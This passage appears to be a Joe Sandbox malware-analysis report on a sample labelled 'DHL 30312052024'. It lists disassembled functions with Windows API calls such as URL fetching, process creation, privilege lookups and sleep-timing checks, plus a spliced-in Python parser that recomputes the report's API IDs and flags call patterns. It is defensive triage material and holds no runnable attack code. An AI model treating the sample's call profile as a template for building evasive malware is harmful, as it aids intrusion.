• DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00C3B9AB,?,?,?), ref: 00C8C56E
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: Cursor$LongMenuPopupProcTrackWindow
• String ID:
• API String ID: 2864067406-0
                                                                                        APIs
                                                                                          • Part of subcall function 00C5810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C58121
                                                                                          • Part of subcall function 00C5810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C5812B
                                                                                          • Part of subcall function 00C5810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C5813A
                                                                                          • Part of subcall function 00C5810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C58141
                                                                                          • Part of subcall function 00C5810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C58157
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C586A3
                                                                                        • _memcmp.LIBCMT ref: 00C586C6
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C586FC
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00C58703
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                        • String ID:
                                                                                        • API String ID: 1592001646-0
                                                                                        • Opcode ID: 0518d1bfaa8da54f68b3ed1307fcd448eb045eda2360368ea43f9c4c8b35fda6
                                                                                        • Instruction ID: ddf688bda5c977defdfd5f64e2cdee4c99ce4b3cea1e795e10238b26fce64bac
                                                                                        • Opcode Fuzzy Hash: 0518d1bfaa8da54f68b3ed1307fcd448eb045eda2360368ea43f9c4c8b35fda6
                                                                                        • Instruction Fuzzy Hash: 78217A71E01109EFDB10DFA4C989BEEB7B8EF45306F154059E854AB240DB30AE49DB98
                                                                                        APIs
                                                                                        • __setmode.LIBCMT ref: 00C209AE
                                                                                          • Part of subcall function 00C05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C67896,?,?,00000000), ref: 00C05A2C
                                                                                          • Part of subcall function 00C05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C67896,?,?,00000000,?,?), ref: 00C05A50
                                                                                        • _fprintf.LIBCMT ref: 00C209E5
                                                                                        • OutputDebugStringW.KERNEL32(?), ref: 00C55DBB
                                                                                          • Part of subcall function 00C24AAA: _flsall.LIBCMT ref: 00C24AC3
                                                                                        • __setmode.LIBCMT ref: 00C20A1A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                        • String ID:
                                                                                        • API String ID: 521402451-0
                                                                                        • Opcode ID: 918d6f99872fe094ed89bf82a6ac85a3f82c2f91aaf67ad8b54a15da3651042c
                                                                                        • Instruction ID: ea5601a3584f44958d58e572b111e43c6f519e1610598a2fcf5855fce76fd5ad
                                                                                        • Opcode Fuzzy Hash: 918d6f99872fe094ed89bf82a6ac85a3f82c2f91aaf67ad8b54a15da3651042c
                                                                                        • Instruction Fuzzy Hash: 2B113A72A04214AFDB08B7B4BC47EBEB7A8DF41320F644116F105575C3EE305986B7A5
                                                                                        APIs
                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C717A3
                                                                                          • Part of subcall function 00C7182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C7184C
                                                                                          • Part of subcall function 00C7182D: InternetCloseHandle.WININET(00000000), ref: 00C718E9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$CloseConnectHandleOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1463438336-0
                                                                                        • Opcode ID: 729a2fb555704b2ce433518a35187a7f125f06f4e1580aa9098c516f3774b4be
                                                                                        • Instruction ID: a1fdb6dd50468a2ba3005e0ffc21f7d044eefff41c272aca6f6b7c82e8793dc3
                                                                                        • Opcode Fuzzy Hash: 729a2fb555704b2ce433518a35187a7f125f06f4e1580aa9098c516f3774b4be
                                                                                        • Instruction Fuzzy Hash: 68210431200601BFEB128F64CC00FBABBADFF48710F18802EFD1996191D731D911A7A1
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNEL32(?,00C8FAC0), ref: 00C63A64
                                                                                        • GetLastError.KERNEL32 ref: 00C63A73
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C63A82
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00C8FAC0), ref: 00C63ADF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                        • String ID:
                                                                                        • API String ID: 2267087916-0
                                                                                        • Opcode ID: 340ea2847690c714e562a02451599bd4e6042c3acf9cbe3c28613ac3f93b7208
                                                                                        • Instruction ID: 265691b6ad6faa746bbb9be2ecd12125190daed30d1a841fc1d6a0d9ab3d42d2
                                                                                        • Opcode Fuzzy Hash: 340ea2847690c714e562a02451599bd4e6042c3acf9cbe3c28613ac3f93b7208
                                                                                        • Instruction Fuzzy Hash: 942194345082419FC710EF68C8C196BB7E4AE55364F144A2DF4A9C72E2D7319A46EB52
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 00C35101
                                                                                          • Part of subcall function 00C2571C: __FF_MSGBANNER.LIBCMT ref: 00C25733
                                                                                          • Part of subcall function 00C2571C: __NMSG_WRITE.LIBCMT ref: 00C2573A
                                                                                          • Part of subcall function 00C2571C: RtlAllocateHeap.NTDLL(013A0000,00000000,00000001,00000000,?,?,?,00C20DD3,?), ref: 00C2575F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap_free
                                                                                        • String ID:
                                                                                        • API String ID: 614378929-0
                                                                                        • Opcode ID: c01e9455fa6f52207fd69fe45da505f0e0c2692e0246c4d8d065864d76756c1e
                                                                                        • Instruction ID: 4f24f173f76774d67784f71dcda98e01c79fe947781b7252aea89fec86a44592
                                                                                        • Opcode Fuzzy Hash: c01e9455fa6f52207fd69fe45da505f0e0c2692e0246c4d8d065864d76756c1e
                                                                                        • Instruction Fuzzy Hash: 75114872911A21AFCF313F74FC05B5E37989F103A1F10492DF9149A164DF348A41A790
                                                                                        APIs
                                                                                          • Part of subcall function 00C05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C67896,?,?,00000000), ref: 00C05A2C
                                                                                          • Part of subcall function 00C05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C67896,?,?,00000000,?,?), ref: 00C05A50
                                                                                        • gethostbyname.WSOCK32(?,?,?), ref: 00C76399
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00C763A4
                                                                                        • _memmove.LIBCMT ref: 00C763D1
                                                                                        • inet_ntoa.WSOCK32(?), ref: 00C763DC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                        • String ID:
                                                                                        • API String ID: 1504782959-0
                                                                                        • Opcode ID: fe62b9b14e478327390fcace58e47ef9e3ee0a8ea3fe7c57d39b0c8c083cde37
                                                                                        • Instruction ID: 353680e6b72cbcf96511e93438f5a48cc639f8aee321f69ccc92e2b5f177d979
                                                                                        • Opcode Fuzzy Hash: fe62b9b14e478327390fcace58e47ef9e3ee0a8ea3fe7c57d39b0c8c083cde37
                                                                                        • Instruction Fuzzy Hash: 9B116031A00109AFCB00FBA4DD46DEEB7B8EF05310B148165F505A72A2DB31AE15EB61
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00C58B61
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C58B73
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C58B89
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C58BA4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: d78be7de0a82660e58d46d2b5aa03afda92cabfa288103592b15b00815b47c77
                                                                                        • Instruction ID: 889779435c4c3d2dd9ad8deef7fcb454495acb9592583cfec998e1f4231e299f
                                                                                        • Opcode Fuzzy Hash: d78be7de0a82660e58d46d2b5aa03afda92cabfa288103592b15b00815b47c77
                                                                                        • Instruction Fuzzy Hash: C3115A79900218FFEB10DFA5CC84FADBBB8FB48710F2041A5EA00B7290DA716E55DB94
                                                                                        APIs
                                                                                          • Part of subcall function 00C02612: GetWindowLongW.USER32(?,000000EB), ref: 00C02623
                                                                                        • DefDlgProcW.USER32(?,00000020,?), ref: 00C012D8
                                                                                        • GetClientRect.USER32(?,?), ref: 00C3B5FB
                                                                                        • GetCursorPos.USER32(?), ref: 00C3B605
                                                                                        • ScreenToClient.USER32(?,?), ref: 00C3B610
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                                        • String ID:
                                                                                        • API String ID: 4127811313-0
                                                                                        • Opcode ID: 83be9a5c6cbdd2a8939a8835cfd3d804f0dfb1f2887a6b325e6766baade90f3f
                                                                                        • Instruction ID: c9a2d78d37c7a8db5f956ebf9cb4b8bff30efe980c1cac1c9c84c4669baf4ce5
                                                                                        • Opcode Fuzzy Hash: 83be9a5c6cbdd2a8939a8835cfd3d804f0dfb1f2887a6b325e6766baade90f3f
                                                                                        • Instruction Fuzzy Hash: 8A113A35910419EFCB00EF98D889AEEB7B8EB05300F440456F911E7280D730BA92DBA9
                                                                                        APIs
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C5FCED,?,00C60D40,?,00008000), ref: 00C6115F
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00C5FCED,?,00C60D40,?,00008000), ref: 00C61184
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C5FCED,?,00C60D40,?,00008000), ref: 00C6118E
                                                                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,00C5FCED,?,00C60D40,?,00008000), ref: 00C611C1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                        • String ID:
                                                                                        • API String ID: 2875609808-0
                                                                                        • Opcode ID: 5d7cf66fddca5b1af31bd52f0a01ef35e06a0a429f9541cb796b3a5c820dd7fc
                                                                                        • Instruction ID: a1c324fe5f57db34c46d8470224fa82750607b9a5858debdceef57c6d7663c83
                                                                                        • Opcode Fuzzy Hash: 5d7cf66fddca5b1af31bd52f0a01ef35e06a0a429f9541cb796b3a5c820dd7fc
                                                                                        • Instruction Fuzzy Hash: 36113C31D0052DE7CF109FA5D888BEEBB78FF0A712F08445AEE41B2240CB749691CB95
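Added example (not code from Joe Sandbox or from this report): a small parser for the function records above that rebuilds the Similarity "API ID" field from the listed API calls and tags a few call combinations worth a second look, such as the QueryPerformanceCounter/Sleep pairing in the record above and the TokenIntegrityLevel/LookupPrivilegeValueW record earlier in this section. The tokenisation rule it uses (keep names without capitals whole, split the rest at capital letters, drop fragments shorter than four characters, group by occurrence count) is inferred from the API ID values printed on this page and is an assumption about the report format, not a documented Joe Sandbox algorithm; the WATCH heuristics and their labels are likewise the author's own, not the report's signatures. The sample text is copied from two of the records on this page.

```python
import re
from collections import Counter, defaultdict

# Constructed sample: two function records copied in the layout of the report
# above (bullet lines, "Part of subcall function" entries, Similarity block).
SAMPLE = """\
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C5FCED,?,00C60D40,?,00008000), ref: 00C6115F
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,00C5FCED,?,00C60D40,?,00008000), ref: 00C61184
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C5FCED,?,00C60D40,?,00008000), ref: 00C6118E
• Sleep.KERNEL32(?,?,?,?,?,?,?,00C5FCED,?,00C60D40,?,00008000), ref: 00C611C1
Memory Dump Source
Similarity
• API ID: CounterPerformanceQuerySleep
APIs
  • Part of subcall function 00C5810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C58121
  • Part of subcall function 00C5810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C5812B
  • Part of subcall function 00C5810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C5813A
  • Part of subcall function 00C5810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C58141
  • Part of subcall function 00C5810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C58157
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C586A3
• _memcmp.LIBCMT ref: 00C586C6
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C586FC
• HeapFree.KERNEL32(00000000), ref: 00C58703
Similarity
• API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
"""

# One "API.MODULE(args), ref: ADDR" entry. The subcall prefix is optional and the
# argument list is skipped, because it can nest parentheses ("00000003(TokenIntegrityLevel)").
API_LINE = re.compile(
    r"^\s*(?:\u2022\s*)?(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+).*?ref: (?P<ref>[0-9A-F]+)\s*$"
)

# Hypothetical triage heuristics (the author's, not Joe Sandbox signatures):
# API sets whose co-occurrence inside one function merits a closer look.
WATCH = {
    "execution timing (debugger/sandbox check)": {"QueryPerformanceCounter", "Sleep"},
    "integrity level / privilege inspection": {"GetTokenInformation", "LookupPrivilegeValueW"},
    "hostname resolution": {"gethostbyname"},
}


def api_tokens(name):
    """Split an API name as the report's API ID field appears to (inferred rule):
    names without capitals (_memcmp, gethostbyname, inet_ntoa) are kept whole;
    others split at capitals, dropping fragments under four characters
    (Get, Rtl, WSA, Lib, Ex and the trailing W/A suffix all disappear)."""
    if not any(c.isupper() for c in name):
        return [name]
    return [t for t in re.findall(r"[A-Z][a-z]*", name) if len(t) >= 4]


def api_id(api_names):
    """Rebuild the API ID: fragments grouped by occurrence count, most frequent
    group first, groups joined with '$', ASCII order inside each group."""
    counts = Counter(t for n in api_names for t in api_tokens(n))
    by_count = defaultdict(list)
    for tok, c in counts.items():
        by_count[c].append(tok)
    return "$".join("".join(sorted(by_count[c])) for c in sorted(by_count, reverse=True))


def parse_records(text):
    """One dict per 'APIs' record: API names in order (subcall entries included)
    plus the API ID the report itself printed for that function."""
    records, cur = [], None
    for line in text.splitlines():
        body = line.strip().lstrip("\u2022 ")
        if body == "APIs":
            cur = {"apis": [], "reported_id": None}
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            cur["apis"].append(m.group("api"))
        elif body.startswith("API ID:"):
            cur["reported_id"] = body[len("API ID:"):].strip()
    return records


def flag(api_names):
    present = set(api_names)
    return sorted(label for label, need in WATCH.items() if need <= present)


def verify(text):
    """(reported_id, computed_id, match, flags) for every record in the text."""
    out = []
    for r in parse_records(text):
        computed = api_id(r["apis"])
        out.append((r["reported_id"], computed, computed == r["reported_id"], flag(r["apis"])))
    return out


if __name__ == "__main__":
    for reported, computed, ok, flags in verify(SAMPLE):
        print("OK " if ok else "BAD", computed, flags)
```

Because the API ID is a pure function of the call list, recomputing it locally lets an analyst look up a function across reports of different samples without the numeric API String ID, whose hashing is not reproduced here. The subcall entries count toward the ID exactly as the report lists them, so a function that only wraps a helper still carries the helper's API fragments.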
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00C5D84D
                                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00C5D864
                                                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00C5D879
                                                                                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00C5D897
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Type$Register$FileLoadModuleNameUser
                                                                                        • String ID:
                                                                                        • API String ID: 1352324309-0
                                                                                        • Opcode ID: 46fbc05e95bd5cb2eb8ab9507939c882d1f445ab4ac5a00dfc02e8ba7fdb9c51
                                                                                        • Instruction ID: 714752da7af3e5237c21331eef0d89475b0e492b63e114d5b056300559b37eee
                                                                                        • Opcode Fuzzy Hash: 46fbc05e95bd5cb2eb8ab9507939c882d1f445ab4ac5a00dfc02e8ba7fdb9c51
                                                                                        • Instruction Fuzzy Hash: 39115E79605304DBE3308F51EC0CF96BBBCEB40B01F10856DA916D6090D7B0E989DBE5
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                        • String ID:
                                                                                        • API String ID: 3016257755-0
                                                                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                        • Instruction ID: 659c63065014d6491f8a894b09784ee6d392aae2af0bd8a668a3a282fd5239c7
                                                                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                        • Instruction Fuzzy Hash: 5A0140B245414ABBCF2A5F84CC45CED3F62BB18350F588615FE2858031D236CAB1BB81
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 00C8B2E4
                                                                                        • ScreenToClient.USER32(?,?), ref: 00C8B2FC
                                                                                        • ScreenToClient.USER32(?,?), ref: 00C8B320
                                                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C8B33B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 357397906-0
                                                                                        • Opcode ID: c282cb2ec90451ee32ec47790fc25be399ddd26d89da0f8c792af709d3ff0513
                                                                                        • Instruction ID: 73ee0b295d0f00344f87d7d888ace24f4c6806941fa7adef3ec32b467ddca366
                                                                                        • Opcode Fuzzy Hash: c282cb2ec90451ee32ec47790fc25be399ddd26d89da0f8c792af709d3ff0513
                                                                                        • Instruction Fuzzy Hash: D0114675D00209EFDB41DF99C444AEEFBB5FF18310F104166E914E3220D735AA558F54
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C8B644
                                                                                        • _memset.LIBCMT ref: 00C8B653
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00CC6F20,00CC6F64), ref: 00C8B682
                                                                                        • CloseHandle.KERNEL32 ref: 00C8B694
                                                                                        Memory Dump Source
